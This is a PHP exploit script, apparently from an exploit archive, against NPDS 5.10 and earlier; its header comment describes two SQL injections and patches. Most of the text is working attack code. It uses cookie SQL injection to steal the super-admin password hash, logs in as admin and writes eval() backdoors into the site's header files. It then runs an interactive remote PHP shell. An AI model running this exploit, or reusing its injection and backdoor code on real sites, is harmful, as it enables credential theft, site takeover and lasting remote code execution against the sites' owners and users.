Net Portal Dynamic System (NPDS) 5.10 Remote Code Execution (2)

<?php /*---------------------------------------------------------* NPDS&nbsp;<=&nbsp;5.10&nbsp;-&nbsp;Remote&nbsp;Code&nbsp;Execution&nbsp;exploit [|Description:|] Security&nbsp;holes&nbsp;were&nbsp;found&nbsp;in&nbsp;NPDS&nbsp;5.10. N掳1:&nbsp;Sql&nbsp;Injection&nbsp;in&nbsp;cookies&nbsp;(File&nbsp;Mainfile.php&nbsp;lines&nbsp;655&nbsp;to&nbsp;691). No&nbsp;check&nbsp;is&nbsp;carried&nbsp;out&nbsp;on&nbsp;nicknames&nbsp;or&nbsp;Id&nbsp;which&nbsp;can&nbsp;allow&nbsp;an&nbsp;attacker to&nbsp;modify&nbsp;a&nbsp;SQL&nbsp;request&nbsp;so&nbsp;as&nbsp;to&nbsp;obtain&nbsp;data. N掳2:&nbsp;SQL&nbsp;Injection&nbsp;due&nbsp;to&nbsp;a&nbsp;bad&nbsp;use&nbsp;of&nbsp;\\\"X_FORWARDED_FOR\\\"&nbsp;(file&nbsp;Mainfile.php&nbsp;lines&nbsp;88&nbsp;to&nbsp;110). NPDS&nbsp;uses&nbsp;the&nbsp;HTTP&nbsp;header&nbsp;\\\"X_FORWARDED_FOR\\\"&nbsp;which&nbsp;normally&nbsp;contains&nbsp;the&nbsp;IP&nbsp;adress of&nbsp;a&nbsp;person&nbsp;using&nbsp;a&nbsp;non&nbsp;anonymous&nbsp;proxy.&nbsp;This&nbsp;Ip&nbsp;address&nbsp;is&nbsp;used&nbsp;in&nbsp;a&nbsp;SQL&nbsp;resquest&nbsp;without&nbsp;appropriate filtering,&nbsp;and&nbsp;an&nbsp;attacker&nbsp;can&nbsp;define&nbsp;\\\"X_FORWARDED_FOR\\\"&nbsp;insering&nbsp;malicious&nbsp;SQL&nbsp;code. [|Advisory:|] http://www.aeroxteam.fr/advisory-NPDS-5.10.txt [|Solution:|] N掳1:&nbsp;File&nbsp;mainfile.php,&nbsp;add&nbsp;after&nbsp;line&nbsp;665: $cookie[0]&nbsp;=&nbsp;inval($cookie[0); $cookie[1]&nbsp;=&nbsp;addslashes($cookie[1]); $cookie[2]&nbsp;=&nbsp;addslashes($cookie[2]); N掳2:&nbsp;Replace&nbsp;fonction&nbsp;\\\"getip\\\"&nbsp;(mainfile.php)&nbsp;by: function&nbsp;getip()&nbsp;{ return&nbsp;$_SERVER[\\\'REMOTE_ADDR\\\']; } Gu1ll4um3r0m41n&nbsp;(aeroxteam&nbsp;--[at]--&nbsp;gmail&nbsp;--[dot]--&nbsp;com) for&nbsp;AeroX&nbsp;(AeroXteam.fr) (C)opyleft&nbsp;2007 Gr33tz:&nbsp;Darkfig,&nbsp;Spamm,&nbsp;Math虏,&nbsp;Barma,&nbsp;NeoMorphS,&nbsp;Snake91,&nbsp;Kad,&nbsp;Nitr0,&nbsp;BlastKiller,&nbsp;Alkino&nbsp;And&nbsp;everybody&nbsp;from&nbsp;#aerox@irc.epiknet.org *---------------------------------------------------------*/ if(count($argv)&nbsp;==&nbsp;5)&nbsp;{ head(); echo&nbsp;\\\" [+]&nbsp;Connection...&nbsp;\\\"; $sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30); if&nbsp;(!$sock)&nbsp;{ die(\\\"Failed Could&nbsp;not&nbsp;connect&nbsp;to&nbsp;\\\".$argv[1].\\\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\\\"); } ######## echo&nbsp;\\\"OK \\\"; echo&nbsp;\\\"[+]&nbsp;Logging&nbsp;to&nbsp;account...&nbsp;\\\"; $reqlogin&nbsp;=&nbsp;\\\"POST&nbsp;\\\".$argv[2].\\\"user.php&nbsp;HTTP/1.1 \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Host:&nbsp;\\\".$argv[1].\\\" \\\"; $reqlogin&nbsp;.=&nbsp;\\\"User-Agent:&nbsp;Googlebot/2.1&nbsp;(+http://www.google.com/bot.html) \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Accept:&nbsp;*/* \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Connection:&nbsp;close \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Referer:&nbsp;http://\\\".$argv[1].\\\"\\\".$argv[2].\\\"user.php \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Content-Type:&nbsp;application/x-www-form-urlencoded \\\"; $reqlogin&nbsp;.=&nbsp;\\\"Content-Length:&nbsp;\\\".strlen(\\\"uname=\\\".$argv[3].\\\"&pass=\\\".$argv[4].\\\"&op=login\\\").\\\" \\\"; $reqlogin&nbsp;.=&nbsp;\\\"uname=\\\".$argv[3].\\\"&pass=\\\".$argv[4].\\\"&op=login\\\"; fwrite($sock,&nbsp;$reqlogin); unset($reqlogin); $pagelogin&nbsp;=&nbsp;\\\'\\\'; while(!feof($sock))&nbsp;{ $pagelogin&nbsp;.=&nbsp;fgets($sock); } fclose($sock); preg_match(\\\"`Set-Cookie:&nbsp;user=(.*?);`\\\",&nbsp;$pagelogin,&nbsp;$cookie); if(empty($cookie[1]))&nbsp;{ die(\\\"Failed Could&nbsp;not&nbsp;login&nbsp;as&nbsp;\\\".$argv[3].\\\"&nbsp;!\\\"); }&nbsp;else&nbsp;{ echo&nbsp;\\\"OK \\\"; } if(($decoded&nbsp;=&nbsp;base64_decode($cookie[1]))&nbsp;!==&nbsp;false)&nbsp;{ $exploded&nbsp;=&nbsp;explode(\\\':\\\',&nbsp;$decoded); $exploded[0]&nbsp;=&nbsp;\\\"\\\'&nbsp;UNION&nbsp;SELECT&nbsp;CONCAT(0x4055534552,&nbsp;aid,&nbsp;0x5553455240,&nbsp;0x204050415353,&nbsp;pwd,&nbsp;0x5041535340)&nbsp;FROM&nbsp;authors&nbsp;WHERE&nbsp;radminsuper=1&nbsp;LIMIT&nbsp;0,1&nbsp;/*\\\"; $exploded[8]&nbsp;=&nbsp;1; $cookieuser&nbsp;=&nbsp;base64_encode(implode(\\\':\\\',&nbsp;$exploded)); } ######## echo&nbsp;\\\"[+]&nbsp;Getting&nbsp;admin&nbsp;password...&nbsp;\\\"; $sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30); if&nbsp;(!$sock)&nbsp;{ die(\\\"Failed Could&nbsp;not&nbsp;connect&nbsp;to&nbsp;\\\".$argv[1].\\\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\\\"); } $reqpass&nbsp;&nbsp;=&nbsp;\\\"GET&nbsp;\\\".$argv[2].\\\"index.php?op=edito&nbsp;HTTP/1.1 \\\"; $reqpass&nbsp;.=&nbsp;\\\"Host:&nbsp;\\\".$argv[1].\\\" \\\"; $reqpass&nbsp;.=&nbsp;\\\"User-Agent:&nbsp;Googlebot/2.1&nbsp;(+http://www.google.com/bot.html) \\\"; $reqpass&nbsp;.=&nbsp;\\\"Accept:&nbsp;*/* \\\"; $reqpass&nbsp;.=&nbsp;\\\"Connection:&nbsp;close \\\"; $reqpass&nbsp;.=&nbsp;\\\"Cookie:&nbsp;user=\\\".$cookieuser.\\\";&nbsp;user_language=french \\\"; fwrite($sock,&nbsp;$reqpass); unset($reqpass); $pagepass&nbsp;=&nbsp;\\\'\\\'; while(!feof($sock))&nbsp;{ $pagepass&nbsp;.=&nbsp;fgets($sock); } fclose($sock); preg_match(\\\"`@USER(.*?)USER@&nbsp;@PASS(.*?)PASS@`\\\",&nbsp;$pagepass,&nbsp;$result); unset($pagepass); if(empty($result[1])&nbsp;||&nbsp;empty($result[2]))&nbsp;{ fclose($sock); die(\\\"Failed&nbsp;! Maybe&nbsp;not&nbsp;vulnerable&nbsp;?!\\\"); }&nbsp;else&nbsp;{ echo&nbsp;\\\"OK \\\"; } ######## echo&nbsp;\\\"[+]&nbsp;Login&nbsp;to&nbsp;admin&nbsp;&&nbsp;injecting&nbsp;PHP&nbsp;code...&nbsp;\\\"; $sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30); if&nbsp;(!$sock)&nbsp;{ die(\\\"Failed Could&nbsp;not&nbsp;connect&nbsp;to&nbsp;\\\".$argv[1].\\\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\\\"); } $cookieadmin&nbsp;=&nbsp;base64_encode($result[1].\\\':\\\'.md5($result[2])); $reqshell&nbsp;&nbsp;=&nbsp;\\\"POST&nbsp;\\\".$argv[2].\\\"admin.php?op=ConfigFiles_save&nbsp;HTTP/1.1 \\\"; $reqshell&nbsp;.=&nbsp;\\\"Host:&nbsp;\\\".$argv[1].\\\" \\\"; $reqshell&nbsp;.=&nbsp;\\\"User-Agent:&nbsp;Googlebot/2.1&nbsp;(+http://www.google.com/bot.html) \\\"; $reqshell&nbsp;.=&nbsp;\\\"Accept:&nbsp;*/* \\\"; $reqshell&nbsp;.=&nbsp;\\\"Connection:&nbsp;close \\\"; $reqshell&nbsp;.=&nbsp;\\\"Cookie:&nbsp;admin=\\\".$cookieadmin.\\\";&nbsp;user_language=french \\\"; $reqshell&nbsp;.=&nbsp;\\\"Referer:&nbsp;http://\\\".$argv[1].\\\"\\\".$argv[2].\\\"admin.php \\\"; $reqshell&nbsp;.=&nbsp;\\\"Content-Type:&nbsp;application/x-www-form-urlencoded \\\"; $reqshell&nbsp;.=&nbsp;\\\"Content-Length:&nbsp;\\\".strlen(\\\"Xtxt=\\\".urlencode(\\\"<?php &nbsp;&nbsp;&nbsp;include(\\\"modules/aide-contextuelle/AC-header.js\\\"); &nbsp;&nbsp;&nbsp;if(!empty($_SERVER[\\\'PHPSHELL\\\'])){eval($_SERVER[\\\'PHPSHELL\\\']);die();} ?>\\\").\\\"&Xfiles=header_head&confirm=Sauver+les+modifications\\\").\\\" \\\"; $reqshell&nbsp;.=&nbsp;\\\"Xtxt=\\\".urlencode(\\\"<?php &nbsp;&nbsp;&nbsp;include_once(\\\"modules/ipban/ban.php\\\"); &nbsp;&nbsp;&nbsp;if(!empty($_SERVER[\\\'HTTP_PHPCODE\\\'])){eval(urldecode(base64_decode($_SERVER[\\\'HTTP_PHPCODE\\\'])));die();} ?>\\\").\\\"&Xfiles=header_before&confirm=Sauver+les+modifications\\\"; fwrite($sock,&nbsp;$reqshell); unset($reqshell); $pageshell&nbsp;=&nbsp;\\\'\\\'; while(!feof($sock))&nbsp;{ $pageshell&nbsp;.=&nbsp;fgets($sock); } fclose($sock); if(preg_match(\\\'`location:&nbsp;admin.php?op=ConfigFiles`\\\',&nbsp;$pageshell))&nbsp;{&nbsp;$ok&nbsp;=&nbsp;1;&nbsp;} unset($pageshell); if(!$ok)&nbsp;{ die(\\\"Failed Unable&nbsp;to&nbsp;write&nbsp;PHP&nbsp;Code\\\"); }&nbsp;else&nbsp;{ echo&nbsp;\\\"OK \\\"; } while(1)&nbsp;{ unset($exec); echo&nbsp;\\\"[PhpShell@\\\".$argv[1].\\\"]$&nbsp;\\\"; $input&nbsp;=&nbsp;trim(fgets(STDIN)); if($input&nbsp;==&nbsp;\\\'quit\\\'&nbsp;||&nbsp;$input&nbsp;==&nbsp;\\\'exit\\\')&nbsp;{ break; } $sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30); if&nbsp;(!$sock)&nbsp;{ die(\\\" Could&nbsp;not&nbsp;connect&nbsp;to&nbsp;\\\".$argv[1].\\\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\\\"); } $req&nbsp;&nbsp;=&nbsp;\\\"GET&nbsp;\\\".$argv[2].\\\"index.php?op=edito&nbsp;HTTP/1.1 \\\"; $req&nbsp;.=&nbsp;\\\"Host:&nbsp;\\\".$argv[1].\\\" \\\"; $req&nbsp;.=&nbsp;\\\"User-Agent:&nbsp;Googlebot/2.1&nbsp;(+http://www.google.com/bot.html) \\\"; $req&nbsp;.=&nbsp;\\\"Accept:&nbsp;*/* \\\"; $req&nbsp;.=&nbsp;\\\"PHPCODE:&nbsp;\\\".urldecode(base64_encode($input)).\\\" \\\"; $req&nbsp;.=&nbsp;\\\"Connection:&nbsp;close \\\"; fwrite($sock,&nbsp;$req); unset($req); $headers&nbsp;=&nbsp;0; while(!feof($sock))&nbsp;{ $buffer&nbsp;=&nbsp;fgets($sock); if(!$headers)&nbsp;{ if($buffer&nbsp;==&nbsp;\\\" \\\")&nbsp;{&nbsp;$headers&nbsp;=&nbsp;1;&nbsp;} }&nbsp;else&nbsp;{ $exec&nbsp;.=&nbsp;$buffer; } } echo&nbsp;$exec.\\\" \\\"; } }&nbsp;else&nbsp;{ usage(); } function&nbsp;usage()&nbsp;{ echo&nbsp;\\\"+------------------------------------------------------+ \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NPDS&nbsp;<=&nbsp;5.10&nbsp;Remote&nbsp;Code&nbsp;Execution&nbsp;exploit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;You&nbsp;need&nbsp;a&nbsp;user&nbsp;account&nbsp;!!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;&nbsp;Usage:&nbsp;php&nbsp;exploit.php&nbsp;site.com&nbsp;/path/&nbsp;user&nbsp;pass&nbsp;&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"+------------------------------------------------------+ \\\"; } function&nbsp;head()&nbsp;{ echo&nbsp;\\\"+----------------------------------------------+ \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;MPDS&nbsp;<=&nbsp;5.10&nbsp;Remote&nbsp;Code&nbsp;Execution&nbsp;exploit&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;| \\\"; echo&nbsp;\\\"+----------------------------------------------+ \\\"; } ?> &nbsp;